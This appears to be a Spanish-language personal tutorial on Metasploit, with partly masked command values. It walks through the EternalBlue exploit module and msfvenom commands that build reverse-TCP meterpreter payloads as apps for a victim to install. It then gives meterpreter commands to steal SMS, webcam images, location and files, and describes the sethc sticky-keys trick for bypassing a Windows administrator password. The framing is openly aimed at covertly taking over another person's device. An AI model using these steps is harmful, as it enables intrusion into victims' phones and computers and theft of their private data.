Kali Linux - Metasploit - Poner veneno en las aplicaciones de Windows

1eros pasos

• msfconsole
• msf6 > search eternalblue
• msf6 > use exploit/windows/smb/ms17_010_eternalblue
• msf6 > show options

Con este ultimo codigo mostrara LH## Y LP### la informacion para crear el tcp_reverse

1.1.- Crear la app para instalar en el dispositivo, ya sea en windows o celular...

msfvenom -p a_____/meterpreter/reverse_tcp L&&&&=###.###.###.### LP&&&=#### R>___.___
msfvenom -p w_____/meterpreter/reverse_tcp LH&&&=###.###.###.### L&&&=#### F>___.___

2.- Entrar a Metasploit: msfconsole... tarda como 10 minutos (aprox) y adicional a eso hay tener todo cerrado para la upgrade...

Y configurar la entrada de la pc al dispositivo

• use exploit/multi/handler
• set PAY/=$# android/meterpreter/reverse_tcp
• set L&&&& ###.###.###.###
• set L&&&& ####

show options (need show u the lport lhost in the black window...)
                       after that..

• exploit

[*] Started reverse TCP handler on ###.###.###.###:####

Y cuando la persona haya instalado la app y la abrá, es cuando hace conexión en la pc---

NOTA: Todo llegara a la conexión virtual.

Comandos:
dump_sms                       
webcam_snap                 
sysinfo
sdcard
download + archivo.etc
wlan_geolocate

Contraseña - Olvide mi contraseña de administrador en mi pc, como ingresar paso a paso...

Iniciar reparación de inicio (recomendado)
Restaurar el equipo >Cancelar

msgbox    recuperación de inicio
                 bla bla bla
                 pestaña abajo[<>]
                 Ubicar el TXT en el texto al final (enlace)

Archivo (abrir)
Equipo
C:\
Windows
System 32  [tener habilitado/abrir todos los archivos]

Ubicar el archivo "sethc" y cambiar el nombre: sethc-bak
Igual con el cmd, ubicarlo pero copy and paste y al nuevo hay que darle el nombre de: sethc.
Cerrar todo y shift debajo de enter 5 vcs y abrira...

Desde acá hay que cambiar la contraseña con.
net user... etc etc..